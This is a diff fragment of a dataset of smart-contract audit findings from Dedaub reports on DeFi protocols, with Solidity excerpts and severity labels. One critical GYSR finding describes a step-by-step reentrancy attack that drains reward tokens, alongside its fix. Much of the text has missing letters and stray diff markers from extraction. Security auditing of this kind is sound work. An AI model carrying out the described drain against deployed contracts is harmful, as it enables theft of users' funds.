early if amount is 0.", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Apr '22.pdf", + "body": "gas optimization RESOLVED Method _getAccountValueAndTotalCollateralValue calls the AccountBalance contracts method getPnlAndPendingFee twice, once directly and once in the call to _getSettlementTokenBalanceAndUnrealizedPnl in _getTotalCollateralValue. The rst call to getPnlAndPendingFee to get the unrealized PnL could be removed if the code was restructured appropriately to reuse the same value returned by _getSettlementTokenBalanceAndUnrealizedPnl. A5 Compiler known issues INFO 0 The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaected. 0 CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts yields considerable power over the protocol, including changing the contracts holding the users funds and adding tokens, which potentially means borrowing tokens using fake collateral, etc. In addition, the owner of the protocol has total control of several protocol parameters: - the collateral ratio of tokens - the discount ratio (applicable in liquidation) - the deposit cap of tokens - the maximum number of dierent collateral tokens for an account - the maintenance margin buer ratio - the allowed ratio of debt in non selement tokens - the liquidation ratio - the insurance fund fee ratio - the debt threshold - the collateral value lower (dust) limit In case the aforementioned parameters are decided by governance in future versions of the protocol, collateral ratios should be approached in a really careful and methodical way. We believe that a more decentralized approach would be to alter these weights in a specic way dened by predetermined formulas (taking into consideration the on-chain volatility and liquidity available on-chain) and allow only small adjustments by governance. 0", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "shares can be drained by the controller devalued via a reentrancy aack ", + "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", + "body": " RESOLVED This vulnerability arises from two separate issues in dierent parts of the code: 1. The TokenUtils::receiveAmount/receiveWithFee functions compute the amount of received tokens as the dierence in balance before and after the transfer. TokenUtils::receiveAmount() function receiveAmount( IERC20 token, uint256 shares, address sender, uint256 amount ) internal returns (uint256) { // transfer uint256 total = token.balanceOf(address(this)); token.safeTransferFrom(sender, address(this), amount); uint256 actual = token.balanceOf(address(this)) - total; // mint shares at current rate uint256 minted = (total > 0) ? (shares * actual) / total : actual * INITIAL_SHARES_PER_TOKEN; require(minted > 0); return minted; } The goal is to support dierent types of tokens (e.g. tokens with transfer fees). This approach, however, introduces a possible aack vector: the code could miscalculate the amount of tokens transferred if some other action is executed in between the two balance readings. Note that token.safeTransferFrom() is an external call outside our control. As such, we cannot exclude the possibility that it returns execution to the adversary (e.g. via a transfer hook). 2. The fund() function, of all reward modules, has no reentrancy guards (likely due to the fact that funding sounds \"harmless\"; we send tokens to the contract without geing anything back). The possible aack: We assume a malicious controller that creates a pool with ERC20FixedRewardModule (for simplicity). His goal is to receive the benets of staking but without giving any rewards back. The reward token used in the pool is a legitimate trusted token. We only assume that it has some ERC777-type transfer hook (or any mechanism to notify the sender when a transferFrom happens). 1. The adversary funds the reward module and waits until several users have staked tokens (giving them rights to reward tokens). 2. He then initiates a number of k nested calls to ERC20FixedRewardModule::fund as follows: ERC20FixedRewardModule::fund() function fund(uint256 amount) external { require(amount > 0, \"xrm4\"); (address receiver, uint256 feeRate) = _config.getAddressUint96( keccak256(\"gysr.core.fixed.fund.fee\")); uint256 minted = _token.receiveWithFee( rewards, msg.sender, amount, receiver, feeRate ); rewards += minted; emit RewardsFunded(address(_token), amount, minted, block.timestamp); } a. He calls fund() with an innitesimal amount (say 1 wei). fund calls receiveWithFee which registers the initial total = balanceOf(this) and calls token.safeTransferFrom. TokenUtils::receiveWithFee() function receiveWithFee(...) internal returns (uint256) { uint256 total = token.balanceOf(address(this)); uint256 fee; if (feeReceiver != address(0) && feeRate > 0 && feeRate < 1e18) { fee = (amount * feeRate) / 1e18; token.safeTransferFrom(sender, feeReceiver, fee); } token.safeTransferFrom(sender, address(this), amount - fee); uint256 actual = token.balanceOf(address(this)) - total; uint256 minted = (total > 0) ? (shares * actual) / total : actual * INITIAL_SHARES_PER_TOKEN; require(minted > 0); return minted; } b. The laer passes control to the adversary (via a send hook), which makes a nested call to fund, again with amount = 1 wei. Which again leads to a new token.safeTransferFrom. c. The process continues until the k-th call, which is now made with a larger amount = N. The adversary stops making nested calls so the previous calls nish their execution starting from the most nested one. d. The last (k-th) call computes actual as the dierence between the two balances which will be equal to N tokens. This causes rewards to be incremented by the corresponding amount of shares (= (rewards * N) / total). e. Now execution returns to the (k-1)-th call, for which the actual transferred amount was just 1 wei. However, the dierence of balances includes the nested k-th call, so actual will be found to be N (not 1 wei), causing rewards to be incremented again by the same amount of shares. f. The same happens with all outer calls, causing rewards to be incremented by k times more shares than they should! 3. The previous step essentially devalued each reward share, since we printed k times more shares than we should have. Note that the controller can withdraw all funds except those corresponding to the shares in debt. But these now are worth less, so the adversary can withdraw more reward tokens than he should. By picking k to be as large as the stack allows, and a large value of N (possibly using a flash loan), the controller can drain almost all reward tokens from the pool, leaving users with no rewards. Note that the other reward modules are also likely vulnerable since they all call receiveWithFee and have no reentrancy guard. To prevent this vulnerability reentrancy guards should be added to all fund methods. Moreover, TokenUtils::receiveAmount could check that the actual transferred amount is no larger than the expected one. This check would still support tokens with transfer fees, but would catch aacks like the one reported here. Resolution: This vulnerability was xed by addressing both issues that enabled it. Specically: A check was added in TokenUtils::receiveAmount to ensure that the transferred amount is no larger than the expected one Reentrancy guards were added to the fund function HIGH SEVERITY: [No high severity issues] MEDIUM SEVERITY: ", + "labels": [ + "Dedaub", + "GYSR - Mar '23", + "Severity: Critical" + ] + }, + { + "title": "use of the factory contracts is only enforced o-chain WONT FIX The proper way to deploy a pool and its modules is via the factory contracts. These contracts ensure that the pool is initialized with proper values that prevent a potentially malicious controller from stealing the investors funds. However, the use of factory contracts is only checked o-chain. PoolFactory keeps a list of contracts it created, and this list presumably is used by the GYSR UI to allow users to interact only with oicially created contracts. On the other hand, anyone could still create their own Pool contracts and manually initialize in any way. Such contracts would have identical source code as the legitimate ones, and it would be hard to recognize them. They would also be clearly unsafe: by using malicious staking and reward modules, or even a fake GYSR token, an adversary could easily steal all the funds deposited by investors. Although the o-chain checks would ensure that no user actually interacts with such contracts, such checks are inherently less reliable than on-chain ones. It would be preferable to ensure that contracts with bytecode identical to the oicial ones can never be improperly initialized, for instance by allowing their constructor to be called by a factory contract. Resolution: This issue largely concerns o-chain aspects and cannot be fully addressed on-chain. As a consequence, it will be addressed by adding clear documentation explaining how to verify the validity of a deployed contract. Unstaking in ERC20FixedRewardModule is inconsistent RESOLVED under dierent use cases M2 The ERC20FixedRewardModule was updated as part of the PR #38 mentioned in the ABSTRACT section. The fundamental functions for the users are stake, unstake and claim. When a user stakes, the pos.debt eld holds their potential rewards if they stake for the entire predened period. However, a user can always claim their rewards for the amount already vested. Here are two scenarios of the same logic that are treated dierently: Case #1: The rst case assumes that the users will not stake more than once. This happens when this reward module is combined with the ERC20BondStaking module since users cant stake twice with a bond. However, if they unstake early, for recovering the remaining principal, their rewards earning ratio should also be reduced. In order for the reward module to achieve this, it treats the user shares as if they were vesting all together. So, when user unstakes early only a percentage of all user shares have vested resulting in losing portion of the earning power as indented. Case #2: The second case is when users can stake more than once. This can happen when this module is combined with other staking modules like ERC20StakingModule for example. Then, when a user stakes again, the function calculates the rewards earned up to that point, updates their records and rolls over the remaining (unvested) amount with the newly added one to start vesting from that point forward. This approach treats the user shares as if they were vesting linearly and not all together which means that the user wont lose his earning power. A detailed example illustrating the inconsistency between the 2 cases is provided in the APPENDIX of this report. 1 Resolution: This issue was addressed by modifying the staking logic to remove the inconsistency. LOW SEVERITY: ID Description ", + "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", + "body": " L1 Approximation errors in ERC20BondStakingModule RESOLVED ERC20BondStakingModule needs to perform vesting and debt decay on multiple amounts which however have dierent vesting/decay periods. To perform this operation in O(1) an approximation method is used, where vesting/decay happens for the whole amount simultaneously, and the period is essentially restarted in every update. This method necessarily introduces an approximation error. If multiple updates happen the resulting values could be substantially lower than the actual ones. What is particularly problematic is that such delays can be produced by events that do not add new value to the system. For instance, vesting a large amount could be substantially delayed by staking (maliciously or coincidentally) small amounts. With just 5 updates the amount vested at the end of the period will be only 67% of the total. Note that there is also an \"opposite extreme\" strategy: instead of restarting the period on every update, we could choose to never restart until the current amount is fully vested. Of course, this method also introduces an error. If the newly deposited amounts are large, delaying them might introduce a larger error than restarting the period. So we propose to follow a hybrid approach, alternating between the two extremes: keep a pending amount whose vesting has not started yet, and will start no later than 1 at the end of the current period, but possibly earlier if it's preferable. When a new amount arrives, we will compute how much error will be introduced by starting a new vesting period, and how much error will be introduced if we delay the new amount, and we'll choose the approach of the smallest error. This report is accompanied by a Jupyter notebook with a discussion of this method, a prototype implementation and some simulations. The proposed method has the following properties: It needs O(1) time and is only marginally more complicated than the simple method. It is guaranteed to vest at least as much as the simple method, and never more than the maximum amount. In order to introduce vesting delays one needs to add new funds to the system, larger than the ones currently being vested. Resolution: This issue was addressed by an improved logic that resets the time period only on stake operations, improving the accuracy while simplifying the code. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", + "labels": [ + "Dedaub", + "GYSR - Mar '23", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", + "body": "is not correctly overridden in ERC20BondStakingModule RESOLVED The ERC20BondStakingModule contract overrides the ERC721::_beforeTokenTransfer() hook. However, the overridden hook hasnt the same signature as the original one causing the compilation to fail. The missing part is the 4th argument which should have been another uint256. ERC721::_beforeTokenTransfer() function _beforeTokenTransfer( address from, address to, uint256, /* firstTokenId */ uint256 batchSize ) internal virtual { if (batchSize > 1) { if (from != address(0)) { _balances[from] -= batchSize; } if (to != address(0)) { _balances[to] += batchSize; } } } ERC20BondStakingModule::_beforeTokenTransfer() function _beforeTokenTransfer( address from, address to, uint256 tokenId ) internal override { if (from != address(0)) _remove(from, tokenId); if (to != address(0)) _append(to, tokenId); } 1", + "labels": [ + "Dedaub", + "GYSR - Mar '23", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", + "body": "tests RESOLVED There are some cases in the test scripts that fail due to the grammar changes that OZ introduced at commit fbf235661e01e27275302302b86271a8ec136fea. They updated the revert messages of the approve(), transferFrom() and safeTransferFrom() functions from: ERC721: caller is not token owner nor approved to: ERC721: caller is not token owner or approved However, the tests haven't been updated to reflect the new changes, so they fail. The aected tests are the following: aquarium.js LoC:113 - when token transfer has not been approved erc20bondstakingmodule.js LoC: 1680 - when user transfers a bond position they do not own LoC: 1689 - when user safe transfers a bond position they do not own LoC: 1699 - when user transfers a bond position that they already transferred", + "labels": [ + "Dedaub", + "GYSR - Mar '23", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", + "body": "gas optimization RESOLVED Since the protocol tries to minimize the gas consumption to the minimum possible, we suggest here a minor optimization in ERC20FixedRewardModule. The pos.updated value could be updated inside the if statement above instead of having to check again whether the period has ended or not. 1 ERC20FixedRewardModule::claim() function claim( bytes32 account, address, address receiver, uint256, bytes calldata ) external override onlyOwner returns (uint256, uint256) { ... if (block.timestamp > end) { e = d; } else { uint256 last = pos.updated; e = (d * (block.timestamp - last)) / (end - last); } ... // Dedaub: This update could be transferred to the above if statement // pos.updated = uint128(block.timestamp < end ? block.timestamp : end); ... for avoiding rechecking whether the period has ended }", + "labels": [ + "Dedaub", + "GYSR - Mar '23", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", + "body": "comment in OwnerController RESOLVED The OwnerController contract provides functionality for the rest of the protocol contracts to manage their owners and their controllers. However, while the comments of the transferOwnership() function state that the owner can renounce ownership by transferring to address(0), this is not possible with the current code as it reverts when the newOwner address is 0. OwnerController::transferOwnership() /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * This can include renouncing ownership by transferring to the zero * address. Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual override { 1 requireOwner(); require(newOwner != address(0), \"oc3\"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } A5 Compiler bugs INFO The code is compiled with Solidity 0.8.18. Version 0.8.18, at the time of writing, has no known bugs. 1", + "labels": [ + "Dedaub", + "GYSR - Mar '23", + "Severity: Informational" + ] + }, + { + "title": "out of gas situation in RewardDistributor and DecollateralisationManager contract ", + "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", + "body": " DISMISSED The RewardsDistributor::getAllUnclaimedRewardAmountsForUserAndAsset() function performs a nested loop that iterates over all possible rewards for all amounts staked by a given user. Since both of these amounts are potentially unbounded, an out of gas error may eventually occur. //RewardsDistributor.sol::getAllUnclaimedRewardAmountsForUserAndAsset function getAllUnclaimedRewardAmountsForUserAndAssets( address[] calldata assets, address user external view override returns (address[] memory rewardsList, uint[] memory unclaimedAmounts) RewardsDataTypes.AssetStakedAmounts[] memory assetStakedAmounts = _getAssetStakedAmounts(assets,user); rewardsList = new address[](_rewardsList.length); unclaimedAmounts = new uint[](rewardsList.length); ) { for (uint i; i < assetStakedAmounts.length; i++) { for (uint r; r < rewardsList.length; r++) { rewardsList[r] = _rewardsList[r]; unclaimedAmounts[r] += _assetData[assetStakedAmounts[i].asset] .rewardDistribution[rewardsList[r]] .userReward[user] .accrued; if (assetStakedAmounts[i].userStake == 0) { continue; } unclaimedAmounts[r] += _computePendingRewardAmountForUser( user, rewardsList[r], assetStakedAmounts[i] ); } } return (rewardsList, unclaimedAmounts); } Similarly, the function getBatchesDecollateralisationInfo() of the contract DecollateralisationManager loops over all batchIds, the number of which could be unbounded. As already mentioned, this might eventually lead to an out of gas failure. //DecollateralisationManger.sol::getBatchesDecollateralisationInfo() function getBatchesDecollateralizationInfo( SolidWorldManagerStorage.Storage storage _storage, uint projectId, uint vintage external view returns (DomainDataTypes.TokenDecollateralizationInfo[] memory result) ) { DomainDataTypes.TokenDecollateralizationInfo[] memory allInfos = new DomainDataTypes.TokenDecollateralizationInfo[]( _storage.batchIds.length ); uint infoCount; for (uint i; i < _storage.batchIds.length; i++) { uint batchId = _storage.batchIds[i]; if ( _storage.batches[batchId].vintage != vintage || _storage.batches[batchId].projectId != projectId ) { continue; } (uint amountOut, uint minAmountIn, uint minCbtDaoCut) = _simulateDecollateralization( _storage, batchId, DECOLLATERALIZATION_SIMULATION_INPUT ); // Dedaub: part of the code is omitted for brevity infoCount = infoCount + 1; } result = new DomainDataTypes.TokenDecollateralizationInfo[](infoCount); for (uint i; i < infoCount; i++) { result[i] = allInfos[i]; } } This issue was discussed with the Solid World team, who estimated that the protocol will not use enough reward tokens, stakes or batchIds to cause it to run out of gas. 7 LOW SEVERITY: ID Descriptio ", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Solid World", "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "rewards might get stuck in CompoundXYStrategy Dismissed (as above) 6 The _beforeMigration hook of CompoundXYStrategy calls _repay and lets it handle the claim of COMP and its conversion to collateral, thus no COMP needs to be transferred to the new strategy prior to migration. However, the claim in _repay happens only when the condition _repayAmount > _borrowBalanceHere evaluates to true, which might not always hold prior to migration, leading to COMP getting stuck in the strategy. This is because COMP is declared a reserved token and thus cannot be swept after migration.", + "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", + "body": "use of the override modier in several contracts RESOLVED In several contracts (most of which have been forked from Aave), many functions are marked with the override modier when no such function is actually inherited by the parent contract. These are probably leftovers from the time (prior to Solidity 0.8.8) when the override keyword was mandatory when a contract was implementing a function from a parent interface EmissionManager congureAssets setRewardOracle setDistributionEnd setEmissionPerSecond updateCarbonRewardDistribution setClaimer setRewardsVault setEmissionManager setSolidStaking setEmissionAdmin setCarbonRewardsManager getRewardsController getEmissionAdmin getCarbonRewardsManager RewardsController getRewardsVault 1 getClaimer getRewardOracle congureAssets setRewardOracle setClaimer setRewardsVault setSolidStaking handleUserStakeChange claimAllRewards claimAllRewardsOnBehalf claimAllRewardsToSelf RewardsDistributor getRewardDistributor getDistributionEnd getRewardsByAsset getAllRewards getUserIndex getAccruedRewardAmountForUser getUnclaimedRewardAmountForUserAndAssets setDistributionEnd setEmissionPerSecond updateCarbonRewardDistribution SolidStaking addToken stake withdraw withdrawStakeAndClaimRewards balanceOf totalStaked getTokensDistributor::getAllUnclaimedReward Resolved in commit 1ad958b6f0d74507c038bd49da281a572e170907. 1", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: Medium" + "Solid World", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "Compound markets are never entered Dismissed (unnecessary) The CompoundLeverageStrategys CToken market Comptroller. This leaves the strategy unable to borrow from the specied CToken. is never entered via Compounds", + "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", + "body": "events could incorporate additional information INFO Creation events, CategoryCreated, ProjectCreated, BatchCreated, could include more information related to the category, project or batch associated with them.", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: Medium" + "Solid World", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "The checkpoint method only considers proting strategies when computing the total prots of a pools strategies Resolved The checkpoint() method of the VFRStablePool iterates over the pools strategies to compute their total prots and update the pools predictedAPY state variable: address[] memory strategies = getStrategies(); uint256 profits; // SL: Is it ok that it doesn't consider strategies at a loss? for (uint256 i = 0; i < strategies.length; i++) { (, uint256 fee, , , uint256 totalDebt, , , ) = IPoolAccountant(poolAccountant).strategy(strategies[i]); uint256 totalValue = IStrategy(strategies[i]).totalValueCurrent(); if (totalValue > totalDebt) { uint256 totalProfits = totalValue - totalDebt; uint256 actualProfits = totalProfits - ((totalProfits * fee) / MAX_BPS); profits += actualProfits; } } The above computation disregards the losses of any strategies that are not proting. Due to that the predicted APY value will not be accurate. 7", + "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - Feb '23.pdf", + "body": "related gas optimization RESOLVED The elds of DomainDataTypes::Category struct can be reordered to be tighter packed in 4 instead of 5 storage slots. // DomainDataTypes.sol::Category struct Category { uint volumeCoefficient; uint40 decayPerSecond; uint16 maxDepreciation; uint24 averageTA; uint totalCollateralized; uint32 lastCollateralizationTimestamp; uint lastCollateralizationMomentum; } // Dedaub: tighter packed version struct Category { uint volumeCoefficient; uint40 decayPerSecond; uint16 maxDepreciation; uint24 averageTA; uint32 lastCollateralizationTimestamp; uint totalCollateralized; uint lastCollateralizationMomentum; } We measured that in certain test cases the use of less SLOAD and STORE instructions reduced the gas consumption by around 1.5-2% and did not cause any regression in 1 terms of gas consumption (and of course correctness). Resolved in commit b3e79c2456ecca913be0165fd49992eba8e6e1. A4 Compiler version and possible bugs RESOLVED The code is compiled with the floating pragma ^0.8.16. It is recommended that the pragma is xed to a specic version. Versions ^0.8.16 of Solidity in particular, have some known bugs, which we do not believe aect the correctness of the contracts. Resolved in commit d68cfaf512d5eb8da646780350713d6c98ad7da2. 1", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: Medium" + "Solid World", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "CompoundXY strategy does not account for rapid rise of Resolved borrow token price (This issue was also used earlier as an example in our architectural recommendations.) The CompoundXY strategy seeks to repay a borrowed amount if its value rises more than expected. However, volatile assets can rise or drop in price dramatically. (E.g., a collateral stablecoin can lose its peg, or a tokens price can double in hours.) This means that the Compound loan may become undercollateralized. In this case, the borrowed amount may be worth more than the collateral, so it would be benecial for the strategy to not repay the loan. Furthermore, it might be the case that the collateral gets liquidated before the strategy rebalances. In this case the strategy will be left with borrow tokens that it can neither transfer nor swap. The strategy can be enhanced to account for the rst of these cases, and the overall architecture can adopt an emergency rescue mechanism for possibly stuck funds. This emergency rescue would be a centralization element, so it should only be authorized by governance. M6 CompoundXYStrategy, CompoundLeverageStrategy: Error code of Mostly Resolved Compound API calls ignored, can lead to silent failure of functionality The calls to many state-altering Compound API calls return an error code, with a 0-value indicating success. These error codes are often ignored, which can cause certain parts of the strategies functionality to fail, silently. The calls with their error status ignored are: CompoundXYStrategy::constructor: Comptroller.enterMarkets() CompoundXYStrategy::updateBorrowCToken: Comptroller.exitMarket(), Comptroller.enterMarkets(), CToken.borrow() CompoundXYStrategy::_mint: CToken.mint() (is returned but not check by the callers of _mint()) CompoundXYStrategy::_reinvest: CToken.borrow() CompoundXYStrategy::_repay: CToken.repayBorrow() CompoundXYStrategy::_withdrawHere: CToken.redeemUnderlying() CompoundLeverageStrategy::_mint: CToken.mint() CompoundLeverageStrategy::_redeemUnderlying: CToken.redeemUnderlying() CToken.redeem(), CompoundLeverageStrategy::_borrowCollateral: CToken.borrow() CompoundLeverageStrategy::_repayBorrow: CToken.repayBorrow() 8 Low Severity Nr. Description", + "html_url": "https://github.com/dedaub/audits/tree/main/Furucombo/Furucombo smart wallet and gelato audit Sep 21.pdf", + "body": "use of weak blacklists Furucombo Gelato makes use of a number of blacklists including: - Who can create a new task - What task can be created It is however trivial for any user to get around this blacklisting style. For instance, in the case of a task, one can simply add some additional calldata which does not aect the semantics of the task. Therefore, if there is a reason to blacklist users or tasks, a stronger mechanism needs to be designed. L2 delegateCallOnly methods not properly guarded in Actions CLOSED In TaskExecutor the delegateCallOnly() modier is dened to ensure that the batchExec() method is only called via delegate call, as intended by the deployers. This can be reused by the other Actions as well, to make sure that they are not misused. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend addressing them. ", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: Medium" + "Furucombo smart wallet and gelato", + "Severity: Low" + ] + }, + { + "title": "pragma ", + "html_url": "https://github.com/dedaub/audits/tree/main/Furucombo/Furucombo smart wallet and gelato audit Sep 21.pdf", + "body": " CLOSED The floating pragma pragma solidity ^0.6.0; is used in most contracts, allowing them to be compiled with the 0.6.0 - 0.6.12 versions of the Solidity compiler. Although the dierences between these versions are small, floating pragmas should be avoided and the pragma should be xed to the version that will be used for the contracts deployment. A2 Compiler known issues INFO The contracts were compiled with the Solidity compiler 0.6.12 which, at the time of writing, has multiple issues related to memory arrays. Since furrucombo-smart-wallet makes heavy use of memory arrays, and sending and receiving these to third party contracts, it is worth considering switching to a newer version of the Solidity compiler. 0", + "labels": [ + "Dedaub", + "Furucombo smart wallet and gelato", + "Severity: Informational" + ] + }, + { + "title": "code ", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": " RESOLVED In UniswapLib.sol, the struct Slot0 denition is not being used. It is recommended that it be removed as it is dead code.", + "labels": [ + "Dedaub", + "Chainlink Uniswap Anchored View", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "ALPHA rewards are not claimed on-chain Status Open The _claimRewardsAndConvertTo() method of the Alpha lend strategy does not do what its name and comments indicate it does. It only converts the claimed ALPHA tokens. The actual claiming of the funds does not appear to happen using an on-chain API.", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": "simplication RESOLVED In UniswapConfig.sol, all getTokenConfigBy* functions have a check that the index is not type(uint).max, however this is redundant as getTokenConfig already covers this case by checking that index < numTokens. For example: function getTokenConfigBySymbolHash(bytes32 symbolHash) public view returns (TokenConfig memory) { uint index = getSymbolHashIndex(symbolHash); // Dedaub: Redundant check; getTokenConfig checks that index < numTokens. That check covers the case where index == type(uint).max // if (index != type(uint).max) { return getTokenConfig(index); } revert(\"token config not found\"); } Can be simplied to: function getTokenConfigBySymbolHash(bytes32 symbolHash) public view returns (TokenConfig memory) { uint index = getSymbolHashIndex(symbolHash) return getTokenConfig(index); }", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Chainlink Uniswap Anchored View", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": "trailing modier parentheses DISMISSED There are a couple of instances where even zero-argument modiers are used with parentheses, even though they can be omied. For example, in UniswapAnchoredView::activateFailover: function activateFailover(bytes32 symbolHash) external onlyOwner() { ... } This paern can be found in: UniswapAnchoredView::activateFailover UniswapAnchoredView::deactivateFailover Ownable::transferOwnership", + "labels": [ + "Dedaub", + "Chainlink Uniswap Anchored View", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": "sanity check for xed price assets RESOLVED In the UniswapAnchoredView constructor, xed price assets (either ETH or USD pegged) check that the provided uniswap market is zero, however the reporter eld is unchecked. It is recommended that the reporter be also required to be zero, for consistency: else { require(uniswapMarket == address(0), \"only reported prices utilize an anchor\"); // Dedaub: Check that reporter is also 0 require(config.reporter == address(0), \"only reported prices utilize a reporter\"); }", + "labels": [ + "Dedaub", + "Chainlink Uniswap Anchored View", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": "functionality is cryptic (fetchAnchorPrice) RESOLVED The correctness of the calculation in UniswapAnchoredView::fetchAnchorPrice is very hard to establish. More comments would help. Specically, the code reads function fetchAnchorPrice(TokenConfig memory config, uint conversionFactor) internal virtual view returns (uint) { uint256 twap = getUniswapTwap(config); uint rawUniswapPriceMantissa = twap; uint unscaledPriceMantissa = rawUniswapPriceMantissa * conversionFactor; uint anchorPrice = unscaledPriceMantissa * config.baseUnit / ethBaseUnit / expScale; return anchorPrice; } The correctness of this calculation depends on the following understanding, which should be documented in code comments, or the functionality is entirely cryptic. (We note that the original UAV code had similar comments, although the ones below are our own.) getUniswapTwap returns the price between the baseUnits of the two tokens in a pair, scaled to e18 rawUniswapPriceMantissa * config.baseUnit : price of 1 token (instead of one baseUnit of token), relative to baseUnit of the other token. Still scaled at e18 unscaledPriceMantissa * config.baseUnit / expScale : (mathematically, not in integer arithmetic) price of 1 token relative to baseUnit of the other, scaled at 1 unscaledPriceMantissa * conversionFactor * config.baseUnit / ethBaseUnit / expScale : in the case of ETH-USDC, conversionFactor is ethBaseUnit, and the above happens to return 1 ETH's price in USDC with 6 decimals of precision, just because the USDC unit has 6 decimals in the case of other tokens, the conversionFactor is the 6-decimal ETH-USDC price, hence the result is the price of 1 token relative to 1 ETH, at 6-decimal precision.", + "labels": [ + "Dedaub", + "Chainlink Uniswap Anchored View", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": "warning RESOLVED The Solidity compiler is issuing a warning for the UniswapAnchoredView::priceInternal function, that the return variable may be unassigned. While this is a false warning, it can be easily suppressed with a simple refactoring of the form: function priceInternal(TokenConfig memory config) internal view returns (uint) if (config.priceSource == PriceSource.REPORTER) return prices[config.symbolHash].price else if (config.priceSource == PriceSource.FIXED_USD) return config.fixedPrice; else { uint usdPerEth = prices[ethHash].price; require(usdPerEth > 0, \"ETH price not set, cannot convert to dollars\"); return usdPerEth * config.fixedPrice / ethBaseUnit; } }", + "labels": [ + "Dedaub", + "Chainlink Uniswap Anchored View", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": "code (UniswapConfig::getTokenConfig) RESOLVED The expression: ((isUniswapReversed >> i) & uint256(1)) == 1 ? true : false can be shortened to the more elegant: ((isUniswapReversed >> i) & uint256(1)) == 1", + "labels": [ + "Dedaub", + "Chainlink Uniswap Anchored View", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", + "body": "pragma RESOLVED The floating pragma pragma solidity ^0.8.7; is used in most contracts, allowing them to be compiled with any version of the Solidity compiler v0.8.* after, and including, v0.8.7. Although the dierences between these versions are small, floating pragmas should be avoided and the pragma should be xed to the version that will be used for the contract deployment (Solidity version 0.8.7 at the audit commit hash). A9 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.8.7 which, at the time of writing, have some known bugs. We inspected the bugs listed for version 0.8.7 and concluded that the subject code is unaected", + "labels": [ + "Dedaub", + "Chainlink Uniswap Anchored View", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", + "body": "margins mapping indexing in SwapManager::swap RESOLVED Method SwapManager::swap performs an internal balance deposit on the margins mapping when params.toMargin evaluates to true. The margins mapping is a double mapping, going from a PrimitiveEngine address to a user address to the users margin. Instead of indexing the rst mapping with params.engine and the second with msg.sender, indexing is implemented the other way around, leading to invalid PrimitiveHouse state. H2 Incorrect margin deposit value in SwapManager::swap RESOLVED There is a second issue with the margins mapping update operation in SwapManager::swap (the one discussed in issue H1). The deposited amount of tokens is deltaIn instead of deltaOut, which creates inconsistency between the states of PrimitiveEngine and PrimitiveHouse and in general is not consistent with the protocols logic. The following 